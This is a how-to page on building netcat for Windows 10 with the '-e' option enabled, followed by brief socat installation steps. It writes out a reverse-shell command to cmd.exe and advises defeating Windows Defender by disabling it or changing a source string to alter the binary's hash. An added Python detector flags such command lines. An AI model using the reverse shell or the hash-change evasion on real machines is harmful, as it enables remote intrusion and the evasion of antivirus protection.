These steps will compile an executable (default: nc.exe) on a Windows 10 machine. This build will enable the “-e” command line option (also known as “GAPING_SECURITY_HOLE”). The “-e” option allows you to pass a command into NetCat; example:
To create a reverse shell:
nc <remote control machine> <remote control port> -e cmd.exe
The caveat for Windows 10 is that Windows Defender detects nc.exe as “malware” and deletes it. Be aware that the git repo we use here does contain a compiled version; if Windows Defender is active, that file will likely be deleted, and a freshly compiled nc.exe will likely be deleted too.
Windows Defender Workaround
You have two easy options to get around Windows Defender.
- Disable Windows Defender while you use netcat, or
- Before you compile, edit a source file. There are numerous places, especially in netcat.c, where status messages (such as the one at line 381) are sent as output to a terminal. If you change the message and then compile, you will change the hash of the file. Windows Defender seems to be largely tied to file hashes.
Let’s Build NetCat
It helps to use an account with elevated permissions.
1) Download the Windows NetCat source code.
2) Download MinGW
3) Configure MinGW
3a) If the MinGW “Installation Manager” does not auto-start after the MinGW installation completes, run it:
Start>MinGW Installation Manager
4) From the MinGW Installation Manager I needed to select the following plugins:
4a) mingw32-developer-toolkit
4b) mingw32-base
4c) mingw32-gcc-g++
4d) mingw32-gcc-objc
4e) msys-base
5) Apply the selected plugins:
Installation > Apply Changes
6) Make sure your PATH system variable includes a reference to the MinGW DLLs.
6a) The default path is:
C:\MinGW\bin
6b) Start > Control Panel > Advanced Settings > Environment Variables
6c) Select “Path” from “User variables for [your user name]”.
6d) Select Edit…
6e) Add the path to the DLL folder (default: C:\MinGW\bin).
6f) Apply the changes and close the Control Panel windows.
6g) Restart Windows
7) Verify that the gcc compiler's search paths include the DLL path.
7a) Open CMD and type:
gcc -print-search-dirs
7b) Among other things you should see references to /mingw32/bin
8) Still in CMD navigate to the folder which holds the NetCat source files.
8a) Run makewin.cmd
8b) You may get the following error:
Access is denied.
0 file(s) copied.
Operation Completed
As long as there are no other errors (warnings are fine) you should be good. What happens is that the default makewin.cmd script attempts to copy the newly compiled nc.exe into your system32 folder; if you get this error, the copy failed because that folder is protected. The error can be ignored, since the compiled binary is already in the folder you are currently in.
8c) There will be some warnings that look like errors.
You now have a compiled nc.exe which is able to run on Windows 10. You can pass in the -e argument.
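The “-e” option described at the top of this page is also what a defender watches for. As an added example (not from the original page or the NetCat project), the following scans constructed process-creation records and flags a netcat-named image launched with -e, or -e followed by a shell, so a rebuilt nc.exe with a new hash still matches on its command line. The Image/CommandLine field names and the sample events are assumptions.

```python
from typing import List, Optional, Tuple

# Constructed sample process-creation records (Sysmon Event ID 1 style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Tools\nc.exe", "CommandLine": r"nc.exe 10.0.0.5 4444 -e cmd.exe"},
    {"Image": r"C:\Users\bob\netcat-win32\nc.exe", "CommandLine": r"nc.exe -l -p 8080"},
    {"Image": r"C:\Users\bob\netcat-win32\nc.exe",
     "CommandLine": r"nc.exe 10.0.0.5 443 -e C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\bob\netcat-win32\nc.exe",
     "CommandLine": r"nc.exe 10.0.0.5 4444 -e C:\Tools\helper.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": r"notepad.exe -e notes.txt"},
]

NETCAT_IMAGES = {"nc.exe", "nc64.exe", "netcat.exe", "ncat.exe"}
SHELL_IMAGES = {"cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh", "pwsh.exe",
                "sh", "sh.exe", "bash", "bash.exe"}

def basename(path: str) -> str:
    """Last path component, lower-cased: C:\\Windows\\System32\\cmd.exe -> cmd.exe."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()

def exec_target(command_line: str) -> Optional[str]:
    """Program passed to -e, or None if -e is absent or has no argument.
    Whitespace splitting suffices for the samples; real data needs a real Windows argv parser."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() == "-e":
            return tokens[i + 1]
    return None

def classify(event: dict) -> Optional[str]:
    """'high' when a netcat-named image execs a known shell, 'medium' when only one of the
    two indicators is present (a rebuilt nc.exe with a new hash still matches here)."""
    target = exec_target(event["CommandLine"])
    if target is None:
        return None
    is_netcat = basename(event["Image"]) in NETCAT_IMAGES
    spawns_shell = basename(target) in SHELL_IMAGES
    if is_netcat and spawns_shell:
        return "high"
    return "medium" if (is_netcat or spawns_shell) else None

def scan(events: List[dict]) -> List[Tuple[int, str]]:
    """(index, severity) for every matching record, in input order."""
    scored = [(i, classify(e)) for i, e in enumerate(events)]
    return [(i, sev) for i, sev in scored if sev]
```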
Read up on how to use NetCat:
What is socat?
socat is a computer networking utility for reading from and writing to network connections using TCP or UDP.
Developed by Gerhard Rieger - http://www.dest-unreach.org/socat
How to install in Windows
1. Download and install Cygwin from https://www.cygwin.com
2. Install additional Cygwin packages:
- gcc-g++
- gcc-core
- cygwin32-gcc-g++
- cygwin32-gcc-core
- make
3. Download socat current version http://www.dest-unreach.org/socat/download/socat-1.7.3.2.tar.gz
4. Open a Cygwin prompt and change to the directory where you downloaded socat:
tar zxvf socat-1.7.3.2.tar.gz
cd socat-1.7.3.2
./configure
make
make install
Done!
Nice things to do with socat
https://blog.chmd.fr/ssh-over-ssl-episode-2-replacing-proxytunnel-with-socat.html
http://www.bitkistl.com/2016/03/socat-by-example.html
;-)